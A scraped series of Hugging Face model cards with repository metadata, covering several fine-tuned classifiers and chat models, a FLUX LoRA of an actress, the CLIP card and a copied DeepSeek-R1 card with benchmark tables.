method introduced in [DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models](https://huggingface.co/papers/2402.03300). ### Framework versions - TRL: 0.15.2 - Transformers: 4.48.2 - Pytorch: 2.5.1 - Datasets: 3.6.0 - Tokenizers: 0.21.1 ## Citations Cite GRPO as: ```bibtex @article{zhihong2024deepseekmath, title = {{DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models}}, author = {Zhihong Shao and Peiyi Wang and Qihao Zhu and Runxin Xu and Junxiao Song and Mingchuan Zhang and Y. K. Li and Y. Wu and Daya Guo}, year = 2024, eprint = {arXiv:2402.03300}, } ``` Cite TRL as: ```bibtex @misc{vonwerra2022trl, title = {{TRL: Transformer Reinforcement Learning}}, author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallouédec}, year = 2020, journal = {GitHub repository}, publisher = {GitHub}, howpublished = {\url{https://github.com/huggingface/trl}} } ```
exala/db_slr_7.1u
exala
2025-05-30T08:04:11Z
0
0
transformers
[ "transformers", "safetensors", "distilbert", "text-classification", "arxiv:1910.09700", "autotrain_compatible", "endpoints_compatible", "region:us" ]
text-classification
2025-05-30T08:03:36Z
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. --> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
Seanwang1221/Gaoyuanyuan_FLUX
Seanwang1221
2025-05-30T08:02:16Z
16
0
diffusers
[ "diffusers", "text-to-image", "lora", "template:diffusion-lora", "base_model:black-forest-labs/FLUX.1-dev", "base_model:adapter:black-forest-labs/FLUX.1-dev", "region:us" ]
text-to-image
2025-05-29T13:59:44Z
--- tags: - text-to-image - lora - diffusers - template:diffusion-lora widget: - text: >- GYY, a woman wearing a (plaid pencil_dress), holding a purse, floral print, depth of field, night cityscape, 1girl, long hair, ulzzang-6500v1.1, (original: 1.2), (realistic: 1.3) , beautiful girl with beautiful details, extremely detailed eyes and face, eyes with beautiful details, absurd, incredibly absurd, huge file size, ultra detail, high resolution, ultra detailed, best quality, masterpiece, illustration, ultra detailed and beautiful, ultra detailed, CG, unity, 8k wallpaper, amazing, fine Detail, masterpiece, top quality, official art, extremely detailed CG unity 8k wallpaper, cinematic lighting, (perfect shiny skin:0.6), slim and smooth lines, (floating), (small breasts:1), earrings , pearl necklace output: url: images/Liblib_00455_.png - text: >- GYY, PH0383RG, In a captivating, high-definition close-up, the image showcases a striking woman with black hair cascading down her shoulders, her brown eyes sparkling with an intriguing gaze as they lock onto the viewer. The camera is angled slightly from below, emphasizing her chiseled jawline and full, luscious lips painted in a bold shade of red. She wears an exquisite Victorian-inspired outfit, complete with a corseted bodice adorned with intricate lace patterns and delicate pearls, and a long, flowing skirt that billows softly around her legs. A dazzling array of jewels and gemstones, including a large pendant necklace and a pair of matching earrings, accentuate her regal beauty. The scene is set in a dimly lit, opulent ballroom with grand chandeliers casting a warm, golden glow on the woman's elegant figure. The emotional tone of the image is one of confidence, allure, and an air of mystery that leaves the viewer captivated and spellbound. output: url: images/Liblib_00460_.png - text: >- GYY, Nikon Z7 II and a NIKKOR Z 50mm f,1girl, 20yo,(wearing a red cheongsam),(in london city),(RAW photo, best quality), (realistic, photo-realistic), masterpiece, an extremely delicate and beautiful, extremely detailed, 2k wallpaper, Amazing, finely detail, extremely detailed CG unity 8k wallpaper, ultra-detailed, highres, soft light, beautiful detailed girl, extremely detailed eyes and face, beautiful detailed nose, beautiful detailed eyes,cinematic lighting,perfect anatomy,(slim body),hair bun,(black hair),city lights at night,smiling output: url: images/Liblib_00470_.png - text: >- GYY, An upper body image of a beautiful young lady, wavy hair, bright brown eyes, and bold eyeliner. She has fake nails, and her lips are shiny and full. She wears helix piercing. The extreme realism focuses on her detailed skin, showing fine textures and natural highlights. The background is open area with Families flying kites in open city, Small groups of people playing instruments in parks Her outfit are Loose-fitting kaftan dress with intricate patterns and earthy tones Subtle skin pores and natural texture on the face and neck, Realistic light reflections on the surface of the eyes, Slightly raised veins visible under the skin on the neck, Subtle veins visible on the eyelids under certain lighting, Realistic reflection of light on the glossy lips, following their curvature, Soft reflections on the necklace, enhancing its metallic look, Soft shadows under the lower lip, enhancing depth and form, slight noise effect to add texture and realism to the image.a slight sheen of sweat or natural skin oil to areas like the forehead and nose.Apply subsurface scattering to the skin to simulate the way light penetrates and scatters within it, enhancing realism. taking a selfie, holding her hand out and smiling cheerfully, her lips open revealing her beautiful teeth and tongue output: url: images/Liblib_00477_.png base_model: black-forest-labs/FLUX.1-dev instance_prompt: GYY --- # Gao Yuanyuan 高圆圆 Flux <Gallery /> ## Model description https:&#x2F;&#x2F;cdn-uploads.huggingface.co&#x2F;production&#x2F;uploads&#x2F;66dc28e2928613d3397f0bf8&#x2F;OV3DPWvDqXFIqjcFxNqAl.mp4 ## Trigger words You should use `GYY` to trigger the image generation. ## Download model Weights for this model are available in Safetensors format. [Download](/Seanwang1221/Gaoyuanyuan_FLUX1/tree/main) them in the Files & versions tab.
Soughing/mlra_v2_alpha_2.0_beta_1.0_medium
Soughing
2025-05-30T08:02:00Z
40
0
null
[ "pytorch", "gpt2", "license:apache-2.0", "region:us" ]
null
2025-05-27T03:42:55Z
--- license: apache-2.0 ---
bhavinjawade/may23-gemma-4b-tq_sft_finetuned-model
bhavinjawade
2025-05-30T08:01:58Z
0
0
transformers
[ "transformers", "tensorboard", "safetensors", "generated_from_trainer", "trl", "sft", "base_model:google/gemma-3-4b-it", "base_model:finetune:google/gemma-3-4b-it", "endpoints_compatible", "region:us" ]
null
2025-05-29T22:32:46Z
--- base_model: google/gemma-3-4b-it library_name: transformers model_name: may23-gemma-4b-tq_sft_finetuned-model tags: - generated_from_trainer - trl - sft licence: license --- # Model Card for may23-gemma-4b-tq_sft_finetuned-model This model is a fine-tuned version of [google/gemma-3-4b-it](https://huggingface.co/google/gemma-3-4b-it). It has been trained using [TRL](https://github.com/huggingface/trl). ## Quick start ```python from transformers import pipeline question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?" generator = pipeline("text-generation", model="bhavinjawade/may23-gemma-4b-tq_sft_finetuned-model", device="cuda") output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0] print(output["generated_text"]) ``` ## Training procedure This model was trained with SFT. ### Framework versions - TRL: 0.16.1 - Transformers: 4.50.0.dev0 - Pytorch: 2.6.0+cu124 - Datasets: 3.3.2 - Tokenizers: 0.21.0 ## Citations Cite TRL as: ```bibtex @misc{vonwerra2022trl, title = {{TRL: Transformer Reinforcement Learning}}, author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallouédec}, year = 2020, journal = {GitHub repository}, publisher = {GitHub}, howpublished = {\url{https://github.com/huggingface/trl}} } ```
sai17/distilbert-base-uncased-finetuned-Sentiment
sai17
2025-05-30T08:01:57Z
0
0
transformers
[ "transformers", "tensorboard", "safetensors", "distilbert", "text-classification", "generated_from_trainer", "base_model:distilbert/distilbert-base-uncased", "base_model:finetune:distilbert/distilbert-base-uncased", "license:apache-2.0", "autotrain_compatible", "endpoints_compatible", "region:us" ]
text-classification
2025-05-30T06:28:22Z
--- library_name: transformers license: apache-2.0 base_model: distilbert-base-uncased tags: - generated_from_trainer metrics: - accuracy - f1 model-index: - name: distilbert-base-uncased-finetuned-Sentiment results: [] --- <!-- This model card has been generated automatically according to the information the Trainer had access to. You should probably proofread and complete it, then remove this comment. --> # distilbert-base-uncased-finetuned-Sentiment This model is a fine-tuned version of [distilbert-base-uncased](https://huggingface.co/distilbert-base-uncased) on the None dataset. It achieves the following results on the evaluation set: - Loss: 0.0021 - Accuracy: 1.0 - F1: 1.0 ## Model description More information needed ## Intended uses & limitations More information needed ## Training and evaluation data More information needed ## Training procedure ### Training hyperparameters The following hyperparameters were used during training: - learning_rate: 2e-05 - train_batch_size: 64 - eval_batch_size: 64 - seed: 42 - optimizer: Use OptimizerNames.ADAMW_TORCH with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments - lr_scheduler_type: linear - num_epochs: 10 ### Training results | Training Loss | Epoch | Step | Validation Loss | Accuracy | F1 | |:-------------:|:-----:|:----:|:---------------:|:--------:|:---:| | 0.0043 | 1.0 | 29 | 0.0040 | 1.0 | 1.0 | | 0.0032 | 2.0 | 58 | 0.0034 | 1.0 | 1.0 | | 0.0025 | 3.0 | 87 | 0.0032 | 1.0 | 1.0 | | 0.0021 | 4.0 | 116 | 0.0025 | 1.0 | 1.0 | | 0.0019 | 5.0 | 145 | 0.0023 | 1.0 | 1.0 | | 0.0017 | 6.0 | 174 | 0.0023 | 1.0 | 1.0 | | 0.0016 | 7.0 | 203 | 0.0022 | 1.0 | 1.0 | | 0.0015 | 8.0 | 232 | 0.0022 | 1.0 | 1.0 | | 0.0014 | 9.0 | 261 | 0.0021 | 1.0 | 1.0 | | 0.0014 | 10.0 | 290 | 0.0021 | 1.0 | 1.0 | ### Framework versions - Transformers 4.52.2 - Pytorch 2.6.0+cu124 - Datasets 2.14.4 - Tokenizers 0.21.1
lelerjosy1137/yuyu
lelerjosy1137
2025-05-30T08:00:40Z
0
0
null
[ "license:apache-2.0", "region:us" ]
null
2025-05-30T08:00:38Z
--- license: apache-2.0 ---
RedbeardNZ/clip-vit-large-patch14
RedbeardNZ
2025-05-30T07:59:01Z
0
0
null
[ "pytorch", "tf", "jax", "safetensors", "clip", "vision", "arxiv:2103.00020", "arxiv:1908.04913", "region:us" ]
null
2025-05-30T07:59:01Z
--- tags: - vision widget: - src: https://huggingface.co/datasets/mishig/sample_images/resolve/main/cat-dog-music.png candidate_labels: playing music, playing sports example_title: Cat & Dog --- # Model Card: CLIP Disclaimer: The model card is taken and modified from the official CLIP repository, it can be found [here](https://github.com/openai/CLIP/blob/main/model-card.md). ## Model Details The CLIP model was developed by researchers at OpenAI to learn about what contributes to robustness in computer vision tasks. The model was also developed to test the ability of models to generalize to arbitrary image classification tasks in a zero-shot manner. It was not developed for general model deployment - to deploy models like CLIP, researchers will first need to carefully study their capabilities in relation to the specific context they’re being deployed within. ### Model Date January 2021 ### Model Type The base model uses a ViT-L/14 Transformer architecture as an image encoder and uses a masked self-attention Transformer as a text encoder. These encoders are trained to maximize the similarity of (image, text) pairs via a contrastive loss. The original implementation had two variants: one using a ResNet image encoder and the other using a Vision Transformer. This repository has the variant with the Vision Transformer. ### Documents - [Blog Post](https://openai.com/blog/clip/) - [CLIP Paper](https://arxiv.org/abs/2103.00020) ### Use with Transformers ```python from PIL import Image import requests from transformers import CLIPProcessor, CLIPModel model = CLIPModel.from_pretrained("openai/clip-vit-large-patch14") processor = CLIPProcessor.from_pretrained("openai/clip-vit-large-patch14") url = "http://images.cocodataset.org/val2017/000000039769.jpg" image = Image.open(requests.get(url, stream=True).raw) inputs = processor(text=["a photo of a cat", "a photo of a dog"], images=image, return_tensors="pt", padding=True) outputs = model(**inputs) logits_per_image = outputs.logits_per_image # this is the image-text similarity score probs = logits_per_image.softmax(dim=1) # we can take the softmax to get the label probabilities ``` ## Model Use ### Intended Use The model is intended as a research output for research communities. We hope that this model will enable researchers to better understand and explore zero-shot, arbitrary image classification. We also hope it can be used for interdisciplinary studies of the potential impact of such models - the CLIP paper includes a discussion of potential downstream impacts to provide an example for this sort of analysis. #### Primary intended uses The primary intended users of these models are AI researchers. We primarily imagine the model will be used by researchers to better understand robustness, generalization, and other capabilities, biases, and constraints of computer vision models. ### Out-of-Scope Use Cases **Any** deployed use case of the model - whether commercial or not - is currently out of scope. Non-deployed use cases such as image search in a constrained environment, are also not recommended unless there is thorough in-domain testing of the model with a specific, fixed class taxonomy. This is because our safety assessment demonstrated a high need for task specific testing especially given the variability of CLIP’s performance with different class taxonomies. This makes untested and unconstrained deployment of the model in any use case currently potentially harmful. Certain use cases which would fall under the domain of surveillance and facial recognition are always out-of-scope regardless of performance of the model. This is because the use of artificial intelligence for tasks such as these can be premature currently given the lack of testing norms and checks to ensure its fair use. Since the model has not been purposefully trained in or evaluated on any languages other than English, its use should be limited to English language use cases. ## Data The model was trained on publicly available image-caption data. This was done through a combination of crawling a handful of websites and using commonly-used pre-existing image datasets such as [YFCC100M](http://projects.dfki.uni-kl.de/yfcc100m/). A large portion of the data comes from our crawling of the internet. This means that the data is more representative of people and societies most connected to the internet which tend to skew towards more developed nations, and younger, male users. ### Data Mission Statement Our goal with building this dataset was to test out robustness and generalizability in computer vision tasks. As a result, the focus was on gathering large quantities of data from different publicly-available internet data sources. The data was gathered in a mostly non-interventionist manner. However, we only crawled websites that had policies against excessively violent and adult images and allowed us to filter out such content. We do not intend for this dataset to be used as the basis for any commercial or deployed model and will not be releasing the dataset. ## Performance and Limitations ### Performance We have evaluated the performance of CLIP on a wide range of benchmarks across a variety of computer vision datasets such as OCR to texture recognition to fine-grained classification. The paper describes model performance on the following datasets: - Food101 - CIFAR10 - CIFAR100 - Birdsnap - SUN397 - Stanford Cars - FGVC Aircraft - VOC2007 - DTD - Oxford-IIIT Pet dataset - Caltech101 - Flowers102 - MNIST - SVHN - IIIT5K - Hateful Memes - SST-2 - UCF101 - Kinetics700 - Country211 - CLEVR Counting - KITTI Distance - STL-10 - RareAct - Flickr30 - MSCOCO - ImageNet - ImageNet-A - ImageNet-R - ImageNet Sketch - ObjectNet (ImageNet Overlap) - Youtube-BB - ImageNet-Vid ## Limitations CLIP and our analysis of it have a number of limitations. CLIP currently struggles with respect to certain tasks such as fine grained classification and counting objects. CLIP also poses issues with regards to fairness and bias which we discuss in the paper and briefly in the next section. Additionally, our approach to testing CLIP also has an important limitation- in many cases we have used linear probes to evaluate the performance of CLIP and there is evidence suggesting that linear probes can underestimate model performance. ### Bias and Fairness We find that the performance of CLIP - and the specific biases it exhibits - can depend significantly on class design and the choices one makes for categories to include and exclude. We tested the risk of certain kinds of denigration with CLIP by classifying images of people from [Fairface](https://arxiv.org/abs/1908.04913) into crime-related and non-human animal categories. We found significant disparities with respect to race and gender. Additionally, we found that these disparities could shift based on how the classes were constructed. (Details captured in the Broader Impacts Section in the paper). We also tested the performance of CLIP on gender, race and age classification using the Fairface dataset (We default to using race categories as they are constructed in the Fairface dataset.) in order to assess quality of performance across different demographics. We found accuracy >96% across all races for gender classification with ‘Middle Eastern’ having the highest accuracy (98.4%) and ‘White’ having the lowest (96.5%). Additionally, CLIP averaged ~93% for racial classification and ~63% for age classification. Our use of evaluations to test for gender, race and age classification as well as denigration harms is simply to evaluate performance of the model across people and surface potential risks and not to demonstrate an endorsement/enthusiasm for such tasks. ## Feedback ### Where to send questions or comments about the model Please use [this Google Form](https://forms.gle/Uv7afRH5dvY34ZEs9)
Jackmin108/qwen-7b-rl-step-1
Jackmin108
2025-05-30T07:57:48Z
0
0
transformers
[ "transformers", "safetensors", "qwen2", "text-generation", "conversational", "arxiv:2501.12948", "license:mit", "autotrain_compatible", "text-generation-inference", "endpoints_compatible", "region:us" ]
text-generation
2025-05-30T05:03:06Z
--- license: mit library_name: transformers --- # DeepSeek-R1 <!-- markdownlint-disable first-line-h1 --> <!-- markdownlint-disable html --> <!-- markdownlint-disable no-duplicate-header --> <div align="center"> <img src="https://github.com/deepseek-ai/DeepSeek-V2/blob/main/figures/logo.svg?raw=true" width="60%" alt="DeepSeek-V3" /> </div> <hr> <div align="center" style="line-height: 1;"> <a href="https://www.deepseek.com/" target="_blank" style="margin: 2px;"> <img alt="Homepage" src="https://github.com/deepseek-ai/DeepSeek-V2/blob/main/figures/badge.svg?raw=true" style="display: inline-block; vertical-align: middle;"/> </a> <a href="https://chat.deepseek.com/" target="_blank" style="margin: 2px;"> <img alt="Chat" src="https://img.shields.io/badge/🤖%20Chat-DeepSeek%20R1-536af5?color=536af5&logoColor=white" style="display: inline-block; vertical-align: middle;"/> </a> <a href="https://huggingface.co/deepseek-ai" target="_blank" style="margin: 2px;"> <img alt="Hugging Face" src="https://img.shields.io/badge/%F0%9F%A4%97%20Hugging%20Face-DeepSeek%20AI-ffc107?color=ffc107&logoColor=white" style="display: inline-block; vertical-align: middle;"/> </a> </div> <div align="center" style="line-height: 1;"> <a href="https://discord.gg/Tc7c45Zzu5" target="_blank" style="margin: 2px;"> <img alt="Discord" src="https://img.shields.io/badge/Discord-DeepSeek%20AI-7289da?logo=discord&logoColor=white&color=7289da" style="display: inline-block; vertical-align: middle;"/> </a> <a href="https://github.com/deepseek-ai/DeepSeek-V2/blob/main/figures/qr.jpeg?raw=true" target="_blank" style="margin: 2px;"> <img alt="Wechat" src="https://img.shields.io/badge/WeChat-DeepSeek%20AI-brightgreen?logo=wechat&logoColor=white" style="display: inline-block; vertical-align: middle;"/> </a> <a href="https://twitter.com/deepseek_ai" target="_blank" style="margin: 2px;"> <img alt="Twitter Follow" src="https://img.shields.io/badge/Twitter-deepseek_ai-white?logo=x&logoColor=white" style="display: inline-block; vertical-align: middle;"/> </a> </div> <div align="center" style="line-height: 1;"> <a href="https://github.com/deepseek-ai/DeepSeek-R1/blob/main/LICENSE" style="margin: 2px;"> <img alt="License" src="https://img.shields.io/badge/License-MIT-f5de53?&color=f5de53" style="display: inline-block; vertical-align: middle;"/> </a> </div> <p align="center"> <a href="https://github.com/deepseek-ai/DeepSeek-R1/blob/main/DeepSeek_R1.pdf"><b>Paper Link</b>👁️</a> </p> ## 1. Introduction We introduce our first-generation reasoning models, DeepSeek-R1-Zero and DeepSeek-R1. DeepSeek-R1-Zero, a model trained via large-scale reinforcement learning (RL) without supervised fine-tuning (SFT) as a preliminary step, demonstrated remarkable performance on reasoning. With RL, DeepSeek-R1-Zero naturally emerged with numerous powerful and interesting reasoning behaviors. However, DeepSeek-R1-Zero encounters challenges such as endless repetition, poor readability, and language mixing. To address these issues and further enhance reasoning performance, we introduce DeepSeek-R1, which incorporates cold-start data before RL. DeepSeek-R1 achieves performance comparable to OpenAI-o1 across math, code, and reasoning tasks. To support the research community, we have open-sourced DeepSeek-R1-Zero, DeepSeek-R1, and six dense models distilled from DeepSeek-R1 based on Llama and Qwen. DeepSeek-R1-Distill-Qwen-32B outperforms OpenAI-o1-mini across various benchmarks, achieving new state-of-the-art results for dense models. **NOTE: Before running DeepSeek-R1 series models locally, we kindly recommend reviewing the [Usage Recommendation](#usage-recommendations) section.** <p align="center"> <img width="80%" src="figures/benchmark.jpg"> </p> ## 2. Model Summary --- **Post-Training: Large-Scale Reinforcement Learning on the Base Model** - We directly apply reinforcement learning (RL) to the base model without relying on supervised fine-tuning (SFT) as a preliminary step. This approach allows the model to explore chain-of-thought (CoT) for solving complex problems, resulting in the development of DeepSeek-R1-Zero. DeepSeek-R1-Zero demonstrates capabilities such as self-verification, reflection, and generating long CoTs, marking a significant milestone for the research community. Notably, it is the first open research to validate that reasoning capabilities of LLMs can be incentivized purely through RL, without the need for SFT. This breakthrough paves the way for future advancements in this area. - We introduce our pipeline to develop DeepSeek-R1. The pipeline incorporates two RL stages aimed at discovering improved reasoning patterns and aligning with human preferences, as well as two SFT stages that serve as the seed for the model's reasoning and non-reasoning capabilities. We believe the pipeline will benefit the industry by creating better models. --- **Distillation: Smaller Models Can Be Powerful Too** - We demonstrate that the reasoning patterns of larger models can be distilled into smaller models, resulting in better performance compared to the reasoning patterns discovered through RL on small models. The open source DeepSeek-R1, as well as its API, will benefit the research community to distill better smaller models in the future. - Using the reasoning data generated by DeepSeek-R1, we fine-tuned several dense models that are widely used in the research community. The evaluation results demonstrate that the distilled smaller dense models perform exceptionally well on benchmarks. We open-source distilled 1.5B, 7B, 8B, 14B, 32B, and 70B checkpoints based on Qwen2.5 and Llama3 series to the community. ## 3. Model Downloads ### DeepSeek-R1 Models <div align="center"> | **Model** | **#Total Params** | **#Activated Params** | **Context Length** | **Download** | | :------------: | :------------: | :------------: | :------------: | :------------: | | DeepSeek-R1-Zero | 671B | 37B | 128K | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1-Zero) | | DeepSeek-R1 | 671B | 37B | 128K | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1) | </div> DeepSeek-R1-Zero & DeepSeek-R1 are trained based on DeepSeek-V3-Base. For more details regarding the model architecture, please refer to [DeepSeek-V3](https://github.com/deepseek-ai/DeepSeek-V3) repository. ### DeepSeek-R1-Distill Models <div align="center"> | **Model** | **Base Model** | **Download** | | :------------: | :------------: | :------------: | | DeepSeek-R1-Distill-Qwen-1.5B | [Qwen2.5-Math-1.5B](https://huggingface.co/Qwen/Qwen2.5-Math-1.5B) | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1-Distill-Qwen-1.5B) | | DeepSeek-R1-Distill-Qwen-7B | [Qwen2.5-Math-7B](https://huggingface.co/Qwen/Qwen2.5-Math-7B) | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1-Distill-Qwen-7B) | | DeepSeek-R1-Distill-Llama-8B | [Llama-3.1-8B](https://huggingface.co/meta-llama/Llama-3.1-8B) | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1-Distill-Llama-8B) | | DeepSeek-R1-Distill-Qwen-14B | [Qwen2.5-14B](https://huggingface.co/Qwen/Qwen2.5-14B) | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1-Distill-Qwen-14B) | |DeepSeek-R1-Distill-Qwen-32B | [Qwen2.5-32B](https://huggingface.co/Qwen/Qwen2.5-32B) | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1-Distill-Qwen-32B) | | DeepSeek-R1-Distill-Llama-70B | [Llama-3.3-70B-Instruct](https://huggingface.co/meta-llama/Llama-3.3-70B-Instruct) | [🤗 HuggingFace](https://huggingface.co/deepseek-ai/DeepSeek-R1-Distill-Llama-70B) | </div> DeepSeek-R1-Distill models are fine-tuned based on open-source models, using samples generated by DeepSeek-R1. We slightly change their configs and tokenizers. Please use our setting to run these models. ## 4. Evaluation Results ### DeepSeek-R1-Evaluation For all our models, the maximum generation length is set to 32,768 tokens. For benchmarks requiring sampling, we use a temperature of $0.6$, a top-p value of $0.95$, and generate 64 responses per query to estimate pass@1. <div align="center"> | Category | Benchmark (Metric) | Claude-3.5-Sonnet-1022 | GPT-4o 0513 | DeepSeek V3 | OpenAI o1-mini | OpenAI o1-1217 | DeepSeek R1 | |----------|-------------------|----------------------|------------|--------------|----------------|------------|--------------| | | Architecture | - | - | MoE | - | - | MoE | | | # Activated Params | - | - | 37B | - | - | 37B | | | # Total Params | - | - | 671B | - | - | 671B | | English | MMLU (Pass@1) | 88.3 | 87.2 | 88.5 | 85.2 | **91.8** | 90.8 | | | MMLU-Redux (EM) | 88.9 | 88.0 | 89.1 | 86.7 | - | **92.9** | | | MMLU-Pro (EM) | 78.0 | 72.6 | 75.9 | 80.3 | - | **84.0** | | | DROP (3-shot F1) | 88.3 | 83.7 | 91.6 | 83.9 | 90.2 | **92.2** | | | IF-Eval (Prompt Strict) | **86.5** | 84.3 | 86.1 | 84.8 | - | 83.3 | | | GPQA-Diamond (Pass@1) | 65.0 | 49.9 | 59.1 | 60.0 | **75.7** | 71.5 | | | SimpleQA (Correct) | 28.4 | 38.2 | 24.9 | 7.0 | **47.0** | 30.1 | | | FRAMES (Acc.) | 72.5 | 80.5 | 73.3 | 76.9 | - | **82.5** | | | AlpacaEval2.0 (LC-winrate) | 52.0 | 51.1 | 70.0 | 57.8 | - | **87.6** | | | ArenaHard (GPT-4-1106) | 85.2 | 80.4 | 85.5 | 92.0 | - | **92.3** | | Code | LiveCodeBench (Pass@1-COT) | 33.8 | 34.2 | - | 53.8 | 63.4 | **65.9** | | | Codeforces (Percentile) | 20.3 | 23.6 | 58.7 | 93.4 | **96.6** | 96.3 | | | Codeforces (Rating) | 717 | 759 | 1134 | 1820 | **2061** | 2029 | | | SWE Verified (Resolved) | **50.8** | 38.8 | 42.0 | 41.6 | 48.9 | 49.2 | | | Aider-Polyglot (Acc.) | 45.3 | 16.0 | 49.6 | 32.9 | **61.7** | 53.3 | | Math | AIME 2024 (Pass@1) | 16.0 | 9.3 | 39.2 | 63.6 | 79.2 | **79.8** | | | MATH-500 (Pass@1) | 78.3 | 74.6 | 90.2 | 90.0 | 96.4 | **97.3** | | | CNMO 2024 (Pass@1) | 13.1 | 10.8 | 43.2 | 67.6 | - | **78.8** | | Chinese | CLUEWSC (EM) | 85.4 | 87.9 | 90.9 | 89.9 | - | **92.8** | | | C-Eval (EM) | 76.7 | 76.0 | 86.5 | 68.9 | - | **91.8** | | | C-SimpleQA (Correct) | 55.4 | 58.7 | **68.0** | 40.3 | - | 63.7 | </div> ### Distilled Model Evaluation <div align="center"> | Model | AIME 2024 pass@1 | AIME 2024 cons@64 | MATH-500 pass@1 | GPQA Diamond pass@1 | LiveCodeBench pass@1 | CodeForces rating | |------------------------------------------|------------------|-------------------|-----------------|----------------------|----------------------|-------------------| | GPT-4o-0513 | 9.3 | 13.4 | 74.6 | 49.9 | 32.9 | 759 | | Claude-3.5-Sonnet-1022 | 16.0 | 26.7 | 78.3 | 65.0 | 38.9 | 717 | | o1-mini | 63.6 | 80.0 | 90.0 | 60.0 | 53.8 | **1820** | | QwQ-32B-Preview | 44.0 | 60.0 | 90.6 | 54.5 | 41.9 | 1316 | | DeepSeek-R1-Distill-Qwen-1.5B | 28.9 | 52.7 | 83.9 | 33.8 | 16.9 | 954 | | DeepSeek-R1-Distill-Qwen-7B | 55.5 | 83.3 | 92.8 | 49.1 | 37.6 | 1189 | | DeepSeek-R1-Distill-Qwen-14B | 69.7 | 80.0 | 93.9 | 59.1 | 53.1 | 1481 | | DeepSeek-R1-Distill-Qwen-32B | **72.6** | 83.3 | 94.3 | 62.1 | 57.2 | 1691 | | DeepSeek-R1-Distill-Llama-8B | 50.4 | 80.0 | 89.1 | 49.0 | 39.6 | 1205 | | DeepSeek-R1-Distill-Llama-70B | 70.0 | **86.7** | **94.5** | **65.2** | **57.5** | 1633 | </div> ## 5. Chat Website & API Platform You can chat with DeepSeek-R1 on DeepSeek's official website: [chat.deepseek.com](https://chat.deepseek.com), and switch on the button "DeepThink" We also provide OpenAI-Compatible API at DeepSeek Platform: [platform.deepseek.com](https://platform.deepseek.com/) ## 6. How to Run Locally ### DeepSeek-R1 Models Please visit [DeepSeek-V3](https://github.com/deepseek-ai/DeepSeek-V3) repo for more information about running DeepSeek-R1 locally. 